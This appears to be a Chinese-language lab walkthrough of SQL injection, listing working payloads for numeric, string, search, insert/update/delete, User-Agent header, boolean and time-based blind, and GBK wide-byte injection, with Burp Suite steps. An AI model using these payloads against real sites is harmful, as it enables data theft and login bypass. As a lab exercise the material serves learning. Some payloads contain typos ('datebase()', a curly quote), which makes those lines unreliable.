数字型注入(post)
post注入方式,可用BurpSuite进行抓包,发送到Repeater模块进行id值的修改
数字型注入 则不需要添加字符
payload: or 1=1
字符型注入(get)
字符型注入 当输入1'时 有报错信息''1'''可以看到源name值由单引号''包裹
可以用 '进行闭合 并用#注释掉后边内容
payload: 1' or 1=1 #
搜索型注入
根据提示 我们可以输入用户名一部分进行查询 并添加字符'如下图 并显示报错
由报错信息可以看到需要加%'进行闭合 用#注释掉后边内容
payload: vi%' or 1=1 #
爆库 payload: vi’ union select 1,database(),3 #
xxx型注入
经过调试该处用')进行闭合 #注释掉后边内容
payload:vi') or 1=1 #
"insert/update"注入
insert
点击注册 输入用户名密码 在注册处用BurpSuite进行抓包,发送到Repeater模块
利用concat执行sql注入语句
使用updatexml报错信息将sql语句执行结果返回
payload: 'or updatexml(1,concat(0x7e,database(),0x7e),0) or'
update
使用普通账号登录 点击修改信息在修改信息处使用BurpSuite进行抓包(修改信息建议不要有空)
payload: 'or updatexml(1,concat(0x7e,database(),0x7e),0) or'
"delete"注入
先进行随意留言 在删除留言时使用BurpSuite进行抓包
payload: 68 or updatexml (1,concat(0x7e,datebase()),0)
且在BurpSuite中Ctrl+U 对payload进行url编码
"http header"注入
使用admin/123456登陆以后刷新用BurpSuite抓包
在user-agent后加入payload
payload: 1' or updatexml (1,concat(0x7e,datebase()),0) or '
盲注(base on boolian)
只有输入 and 1=1时才有回显
payload:vince' and 1=1 #
盲注(base on time)
payload: vince' and sleep(5)#
宽字节注入
因为是post注入方式需要用BurpSuite进行抓包
payload:vince%df’ or 1=1#
宽字节注入是要满足两个条件
1、数据库连接时开启gbk编码
2、对特殊字符进行\转义
当遇到‘时 由于\会对'进行转义 \在url中为%5c 则%df' 成为 %df%5c'
%df%5c在gbk编码中为一个汉字 从而'从\转义中逃脱出来